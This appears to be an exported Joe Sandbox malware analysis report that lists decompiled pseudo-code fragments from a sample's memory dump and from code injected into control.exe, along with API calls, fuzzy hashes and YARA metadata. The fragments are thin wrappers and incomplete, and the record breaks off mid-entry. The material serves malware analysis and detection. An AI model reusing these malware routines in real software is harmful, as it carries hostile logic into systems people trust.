Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A140(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDC0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1E0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D460( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B500(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040a15c
0x0040a15f
0x0040a164
0x0040a169
0x0040a173
0x0040a178
0x0040a17b
0x0040a17d
0x0040a185
0x0040a18a
0x0040a18a
0x0040a191
0x0040a199
0x0040a19c
0x0040a19e
0x0040a1b2
0x00000000
0x0040a1b4
0x0040a1ba
0x0040a16e
0x0040a16e
0x0040a16e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1B2

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction ID: 11ee5f3ab083712590cb1e55c2eb63b1a51d73a2d1413e9428d26e0fcce9e281
Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction Fuzzy Hash: 810152B5E0020DB7DF10DBA1DC42FDEB7789B54308F0441A9E908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041a31f
0x0041a327
0x0041a35d
0x0041a361

APIs

NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A30C Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0041A30C(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				asm("cli");
				_t17 = _a4;
				_t3 = _t17 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t17, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x0041a30e
0x0041a313
0x0041a31f
0x0041a327
0x0041a35d
0x0041a361

APIs

NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
Instruction ID: 263d1f3f99240851049625e71f71d18099490efd6d8311ba672ad34fb7675b53
Opcode Fuzzy Hash: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
Instruction Fuzzy Hash: 8DF0E2B2214149AFCB08CF98DD85CEB77A9EF8C754B15868DFA1D93202D634E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3C0 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr* _t14;
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				_t14 = E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				 *_t14 =  *_t14 + _t14;
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x0041a3c3
0x0041a3cf
0x0041a3d7
0x0041a3da
0x0041a405
0x0041a409

APIs

NtReadFile.NTDLL(004159C2,5DA515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5DA515B3,004159C2,?,00000000), ref: 0041A405

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a4ff
0x0041a507
0x0041a529
0x0041a52d

APIs

NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d7f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a443
0x0041a446
0x0041a44f
0x0041a457
0x0041a465
0x0041a469

APIs

NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00408ED0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408ED0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF40( &_v284, 0x104);
						E0041C5B0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00408edb
0x00408ee3
0x00408ee5
0x00408eea
0x00408eef
0x00408f02
0x00408f07
0x00408f10
0x00408f1c
0x00408f2f
0x00408f34
0x00408f37
0x00408f40
0x00408f52
0x00408f57
0x00408f5c
0x00000000
0x00000000
0x00408f5e
0x00408f62
0x00000000
0x00000000
0x00408f64
0x00000000
0x00408f62
0x00408f66
0x00408f69
0x00408f6f
0x00408f71
0x00408f7c
0x00408f81
0x00408f84
0x00408f91
0x00408f9c
0x00408f9e
0x00408fa4
0x00408fa8
0x00408fab
0x00408fab
0x00408fb2
0x00408fb5
0x00408fba
0x00408fc7
0x00408ef6
0x00408ef6
0x00408ef6

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
Instruction ID: cf0e5f29dbad696541b590ed4d5857ed9ac00164998f33992c9cd2087abb1f81
Opcode Fuzzy Hash: 5888a8a14cf9970632bbbccff14409b014fe8045011b9cb9f0e297ecaf23f39a
Instruction Fuzzy Hash: CD210CB2D4010957CB20D6749D42AFB73ACAB54314F44057FF989A3181FA387B8987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407643 Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00407643(void* __ecx, void* __esi, void* __eflags) {

				if(__eflags <= 0) {
					asm("enter 0xc985, 0x74");
					asm("adc [ecx+0x333333f9], eax");
				} else {
					__esi = __esi - 1;
					asm("das");
					asm("loop 0x58");
					__esi = __eax;
					__eax = E0041B7B0(__ecx);
					__eax = __eax + __esi + 0x1000;
					__esi = __esi;
					return __eax;
				}
			}

0x00407649
0x00407629
0x0040762d
0x0040764b
0x0040764b
0x0040764e
0x0040764f
0x0040765e
0x00407660
0x00407665
0x0040766c
0x0040766d
0x0040766d

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
Instruction ID: 65418023749dded0563ca6f36eb900a0dc795f2cd1bf22a836154a5418c3b2bc
Opcode Fuzzy Hash: 2cdd4d14d0e017872e6a032a06e3fc2351971139e764dec989e95496a5714a34
Instruction Fuzzy Hash: BB11AF31E4465937D7319A385C42FEE77489F41760F0841AFFA44AB1C2E699690682D6

Uniqueness

Uniqueness Score: -1.00%

Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BF90( &_v67, 0, 0x3f);
				E0041CB70( &_v68, 3);
				_t12 = E0040A140(_a4 + 0x20,  &_v68); // executed
				_t13 = E00415AA0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x0040768f
0x00407693
0x0040769e
0x004076ae
0x004076be
0x004076c3
0x004076ca
0x004076cd
0x004076da
0x004076dc
0x004076de
0x004076fb
0x004076fb
0x00000000
0x004076fd
0x00407702

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
Instruction ID: 724692d215f1cdb5ed0721353eb2d7bb8a3c5ff321720c45d76a988cf6dc1689
Opcode Fuzzy Hash: 987d68c3a03c8d498e9c25042e05d46bb8873fa97b0269841de7b22953abdee4
Instruction Fuzzy Hash: A401A731A8022877E720A6959C43FFE776C9F45B54F04412AFF04FA1C1EAE9790647EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5E0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a5f7
0x0041a60d
0x0041a611

APIs

RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a62f
0x0041a637
0x0041a64d
0x0041a651

APIs

RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a79a
0x0041a7b0
0x0041a7b4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
Instruction ID: f4097edd8bfdf788a7289d32f53fff5c9a201f479a098bc4100019dcd6ecaf01
Opcode Fuzzy Hash: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
Instruction Fuzzy Hash: C4E0C2B054D3C46ED712EB688C90EC7BFA48F06B08F19459DF4C84B202C634E566D3A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00417317 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417317(intOrPtr* __ecx) {
				void* _t1;

				_t1 =  *__ecx();
				_push(ds);
				return _t1 + 1;
			}

0x00417317
0x0041731a
0x00417326

Memory Dump Source

Source File: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_iuvRyl9i7D.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
Instruction ID: e3425fe385282f0430888d8fca4db5bb681d3f8174616abd4976eda0fe5f5ced
Opcode Fuzzy Hash: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
Instruction Fuzzy Hash: 88B09226A064089A54150C18B8080B4F724D18313BB1023D7EC09A30104C0384150288

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exePID: 6628, Parent PID: 3616COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	1.2%
Total number of Nodes:	1104
Total number of Limit Nodes:	127

Executed Functions

Function 00611659 Relevance: 4.6, APIs: 3, Instructions: 103fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0061172F
FindNextFileW.KERNELBASE(?,00000010), ref: 0061176E
FindClose.KERNELBASE(?), ref: 00611779

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 3a92605004241d88e55dd3b8d2f1292182371901c873e971614b5010335230d7
Instruction ID: 6d5cc0f4325240b020908be17a408bb4e69e7529245f813bb34f7b05c6ab0f57
Opcode Fuzzy Hash: 3a92605004241d88e55dd3b8d2f1292182371901c873e971614b5010335230d7
Instruction Fuzzy Hash: F331C575900308ABDB20DF64CC85FEB7779EF88704F18458DB609A62C1E6B0AAC48B90

Uniqueness

Uniqueness Score: -1.00%

Function 00611660 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0061172F
FindNextFileW.KERNELBASE(?,00000010), ref: 0061176E
FindClose.KERNELBASE(?), ref: 00611779

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: ba0b25944bebf99b8da63c7bb0b9be61db689ab22a881b12d9834ab6e5712d2b
Instruction ID: 06be80e76c42b1fcdc772db58414993842265a140bb608a1710e95f2b835c530
Opcode Fuzzy Hash: ba0b25944bebf99b8da63c7bb0b9be61db689ab22a881b12d9834ab6e5712d2b
Instruction Fuzzy Hash: B6318575900309ABDB60DF64CC85FEB7779AF88704F18455DB609A62C1E6B0AAC48B94

Uniqueness

Uniqueness Score: -1.00%

Function 0061A4F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00010000,00000000,>}`,?,00000000,00000000,00607D3E,00000000), ref: 0061A529

Strings

>}`, xrefs: 0061A519, 0061A524

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: >}`
API String ID: 2167126740-110589803
Opcode ID: 6a72fce7b4e4fb895156bc15b288b739ab2ad853206af1fb45c0b029d72a6e70
Instruction ID: 352863f73a6a118d00846921f33c6671c8c86a1af08376aced4b3187bc4a1e11
Opcode Fuzzy Hash: 6a72fce7b4e4fb895156bc15b288b739ab2ad853206af1fb45c0b029d72a6e70
Instruction Fuzzy Hash: 80F0FBB2210208ABDB18DF89DC81EAB77ADAF88654F118208BA0897241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0061A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,00615807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00615807,00000000,00000005,00000060,00000000,00000000), ref: 0061A35D

Memory Dump Source

Source File: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_600000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 05f8cbe9a67053faebbdd48497d385cf30aaceaf448df965e6d79a527728fe2c
